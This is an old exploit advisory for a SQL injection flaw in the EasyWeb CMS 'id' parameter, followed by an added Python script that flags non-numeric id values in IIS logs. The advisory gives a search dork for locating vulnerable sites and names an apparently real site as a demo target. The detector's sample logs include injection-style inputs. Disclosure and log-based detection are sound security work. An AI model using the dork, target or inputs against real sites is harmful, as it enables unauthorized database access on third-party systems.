EasyWeb suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
# Exploit Title: easyweb SQLi Vulnerability
# Date: 09/03/2012
# Author: Persia Security Group - (Prince & mafia1990)
# Vendor Homepage: http://www.easy-web.it/
# Version: All Versions
# Google Dork: intext:"powered by easyweb" site:it
# Tested on: Win 2003 & 2008 Server, Vista, 7 & IIS 6.0, 7.0, 7.5
==========================================================================================
Vulnerability Details
==========================================================================================
/*********/
intext:"powered by easyweb" site:it
/*********/
========================================Exploit============================================
The SQLi vulnerability is in the param [?id=].
Code: asp, aspx, MSAccess
Example:
http://localhost/anyanyany.asp?id=XX[SQLi]
Demo:
http://www.cococool.it/dettagli.asp?id=1666[SQLi Here]
==========================================================================================
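
Detection note (an added example, not part of the original advisory and not EasyWeb code): the affected parameter is the id query value on .asp/.aspx pages served by IIS, so requests whose decoded id is not a plain integer stand out in the IIS W3C logs. The log lines, IP addresses and the assumption that legitimate id values are always integers are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C extended log sample (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-03-09 10:01:02 192.0.2.10 GET /dettagli.asp id=1666 200
2012-03-09 10:01:09 192.0.2.44 GET /dettagli.asp id=1666%27 500
2012-03-09 10:01:15 192.0.2.44 GET /news.aspx ID=12+or+1%3D1 200
2012-03-09 10:02:00 192.0.2.10 GET /style.css - 200
2012-03-09 10:02:31 192.0.2.10 GET /dettagli.asp id=+42 200
"""

NUMERIC_ID = re.compile(r"\d{1,10}")  # assumption: id is always an integer key
PAGE_EXT = (".asp", ".aspx")


def suspicious_id_requests(log_text):
    """Return (client_ip, uri_stem, decoded_id, status) for non-numeric id values."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                        # skip malformed or truncated rows
        row = dict(zip(fields, parts))
        if not row.get("cs-uri-stem", "").lower().endswith(PAGE_EXT):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qsl URL-decodes values: '+' becomes a space, %27 a quote.
        for name, value in parse_qsl(query, keep_blank_values=True):
            # Surrounding whitespace is tolerated; anything else non-digit is flagged.
            if name.lower() == "id" and not NUMERIC_ID.fullmatch(value.strip()):
                hits.append((row.get("c-ip"), row["cs-uri-stem"], value,
                             row.get("sc-status")))
    return hits


if __name__ == "__main__":
    for hit in suspicious_id_requests(SAMPLE_LOG):
        print(hit)
```

A flagged request that also returned status 500 is worth checking first, since it suggests the value reached the database query and broke it.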